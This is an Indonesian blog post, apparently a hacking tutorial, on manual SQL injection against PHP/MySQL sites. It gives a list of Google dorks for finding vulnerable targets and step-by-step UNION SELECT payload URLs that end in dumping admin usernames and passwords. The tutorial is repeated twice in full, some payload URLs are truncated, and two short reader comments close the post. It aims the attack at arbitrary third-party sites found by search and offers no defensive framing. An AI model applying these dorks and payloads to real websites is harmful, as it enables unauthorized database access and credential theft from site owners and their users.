Untuk Mencari Target
Cari saja dengan mudah menggunakan dork dork yang sdh tersedia dibawah atau hasil pengembangan agan2 sendiri
Code:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:read.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()
Langkah2nya :
1. Pilih salah satu website yang telah ditemukan tadi.
Misal:
http://www.example.com/index.php?id=3
untuk memeriksa adanya Bug MySQL tinggal tambahin ' (petik) di akhir URL
Contoh:
http://www.example.com/index.php?id=3'
lalu tekan enter sampai mendapatkan tulisan error.
2.Mendapatkan Jumlah Kolom
Cara termudah untuk melakukannya adalah menggunakan query 'order by'. Yang harus dilakukan adalah meletakkan ORDER BY (angka) --
pada akhir url .
Contoh:
http://www.example.com/index.php?id=3 ORDER BY (number)--
Pada kasus kita harus mencari sampe menemukan error pada situs tersebut.
Contoh:
http://www.example.com/index.php?id=3 ORDER BY 1-- belum error
http://www.example.com/index.php?id=3 ORDER BY 2-- belum error
http://www.example.com/index.php?id=3 ORDER BY 3-- belum error
http://www.example.com/index.php?id=3 ORDER BY 9-- belum error
http://www.example.com/index.php?id=3 ORDER BY 10-- error
Maka dapat kita simpulkan jika jumlah kolomnya hanya ada 9, karena jika 10 maka terjadi error.
3. Cari Informasi
Kita melakukan hal tersebut dengan menggunakan fungsi "UNION SELECT" dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:
Contoh:
http://www.example.com/index.php?id=-3+U...,6,7,8,9--
Jangan lupa untuk menyisipkan tanda "-" sebelum isi parameter id , jadi sebagai contoh di atas kita selipka tanda "-" didepan angka "3", nah setelah semua dilakukan, maka akan muncul table yang memiliki isi didalamnya. Catatlah nomor kolom table yang memiliki informasi di dalam database tersebut.
4. Mencari versi dari database
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.
URL nya adalah sebagai berikut:
Code:
http://www.example.com/index.php?id=-3+U...,6,7,8,9--
Kita ganti angka yang keluar tadi di nomor 3 dengan “@@version” untuk mengetahui informasi versi database, berikut contohnya:
Semisal tadi muncul di angka 1 maka:
http://www.example.com/index.php?id=-3+U...,6,7,8,9--
Jika di angka 3 maka:
http://www.example.com/index.php?id=-3+U...,6,7,8,9--
Tekan enter, maka anda akan menemukan informasi database yang digunakan.
Hal ini biasanya bekerja pada versi database 5.* keatas.
5. Mencari nama database
Kita lakukan hal ini dengan mengganti "@@version"
dengan "group_concat(schema_name)" dan juga ditambahkan "+ from+information_schema.schemata–" sesudah kata terakhir di table database.
Contoh:
http://www.example.com/index.php?id=-3+U...5,6,7,8,9+ from+information_schema.schemata--
Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti "group_concat(schema_name)" dengan concat(database()) dan hapus "+ from+information_schema.schemata"
Jadi URL nya akan menjadi seperti ini:
http://www.example.com/index.php?id=-3+U...,6,7,8,9--
Selamat, anda telah mendapatkan informasi database yang saat ini digunakan.
6. Mencari Nama Tabel
Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti "concat(database())" dengan group_concat(table_name) dan tambahkan "from information_schema.tables where table_schema=database()" diantara nomor awal dan "–" hapus juga tanda "+" dari "union select".
Contoh:
http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--
Maka semua nama tabel akan terlisting secara otomatis.
7. Menemukan Nama Kolom
Lakukan dengan hanya merubah "table_name" ke "column_name" dan "information_schema.tables" ke "information_schema.columns".
Contoh
http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()--
Hal tersebut akan memunculkan nama table.
8. Mengambil Informasi Database
Sekarang kita sudah mengetahui "database name, table names, dan colomn names", kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:
http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7,8,9 from databasename.tablename--
Sekarang ganti "columnname" dengan kolom yang anda mau ambil informasinya. "0x3a" akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing kolom. Jangan lupa juga untuk merubah "databasename.tablename" dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut.
Contoh:
http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7,8,9 from user.t_admin--
Sekarang anda akan mendapatkan informasi username & database
Kembangkanlah ilmu dan sebarkanlah ilmu walau satu ayat.
Terima kasih
Cari saja dengan mudah menggunakan dork dork yang sdh tersedia dibawah atau hasil pengembangan agan2 sendiri
Code:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:read.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()
Langkah2nya :
1. Pilih salah satu website yang telah ditemukan tadi.
Misal:
http://www.example.com/index.php?id=3
untuk memeriksa adanya Bug MySQL tinggal tambahin ' (petik) di akhir URL
Contoh:
http://www.example.com/index.php?id=3'
lalu tekan enter sampai mendapatkan tulisan error.
2.Mendapatkan Jumlah Kolom
Cara termudah untuk melakukannya adalah menggunakan query 'order by'. Yang harus dilakukan adalah meletakkan ORDER BY (angka) --
pada akhir url .
Contoh:
http://www.example.com/index.php?id=3 ORDER BY (number)--
Pada kasus kita harus mencari sampe menemukan error pada situs tersebut.
Contoh:
http://www.example.com/index.php?id=3 ORDER BY 1-- belum error
http://www.example.com/index.php?id=3 ORDER BY 2-- belum error
http://www.example.com/index.php?id=3 ORDER BY 3-- belum error
http://www.example.com/index.php?id=3 ORDER BY 9-- belum error
http://www.example.com/index.php?id=3 ORDER BY 10-- error
Maka dapat kita simpulkan jika jumlah kolomnya hanya ada 9, karena jika 10 maka terjadi error.
3. Cari Informasi
Kita melakukan hal tersebut dengan menggunakan fungsi "UNION SELECT" dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:
Contoh:
http://www.example.com/index.php?id=-3+U...,6,7,8,9--
Jangan lupa untuk menyisipkan tanda "-" sebelum isi parameter id , jadi sebagai contoh di atas kita selipka tanda "-" didepan angka "3", nah setelah semua dilakukan, maka akan muncul table yang memiliki isi didalamnya. Catatlah nomor kolom table yang memiliki informasi di dalam database tersebut.
4. Mencari versi dari database
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.
URL nya adalah sebagai berikut:
Code:
http://www.example.com/index.php?id=-3+U...,6,7,8,9--
Kita ganti angka yang keluar tadi di nomor 3 dengan “@@version” untuk mengetahui informasi versi database, berikut contohnya:
Semisal tadi muncul di angka 1 maka:
http://www.example.com/index.php?id=-3+U...,6,7,8,9--
Jika di angka 3 maka:
http://www.example.com/index.php?id=-3+U...,6,7,8,9--
Tekan enter, maka anda akan menemukan informasi database yang digunakan.
Hal ini biasanya bekerja pada versi database 5.* keatas.
5. Mencari nama database
Kita lakukan hal ini dengan mengganti "@@version"
dengan "group_concat(schema_name)" dan juga ditambahkan "+ from+information_schema.schemata–" sesudah kata terakhir di table database.
Contoh:
http://www.example.com/index.php?id=-3+U...5,6,7,8,9+ from+information_schema.schemata--
Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti "group_concat(schema_name)" dengan concat(database()) dan hapus "+ from+information_schema.schemata"
Jadi URL nya akan menjadi seperti ini:
http://www.example.com/index.php?id=-3+U...,6,7,8,9--
Selamat, anda telah mendapatkan informasi database yang saat ini digunakan.
6. Mencari Nama Tabel
Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti "concat(database())" dengan group_concat(table_name) dan tambahkan "from information_schema.tables where table_schema=database()" diantara nomor awal dan "–" hapus juga tanda "+" dari "union select".
Contoh:
http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--
Maka semua nama tabel akan terlisting secara otomatis.
7. Menemukan Nama Kolom
Lakukan dengan hanya merubah "table_name" ke "column_name" dan "information_schema.tables" ke "information_schema.columns".
Contoh
http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()--
Hal tersebut akan memunculkan nama table.
8. Mengambil Informasi Database
Sekarang kita sudah mengetahui "database name, table names, dan colomn names", kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:
http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7,8,9 from databasename.tablename--
Sekarang ganti "columnname" dengan kolom yang anda mau ambil informasinya. "0x3a" akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing kolom. Jangan lupa juga untuk merubah "databasename.tablename" dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut.
Contoh:
http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7,8,9 from user.t_admin--
Sekarang anda akan mendapatkan informasi username & database
Kembangkanlah ilmu dan sebarkanlah ilmu walau satu ayat.
Terima kasih
Salam te-putranto.blogspot.com
mantaf um . . .
ReplyDeletekunjungan balik ini um . . .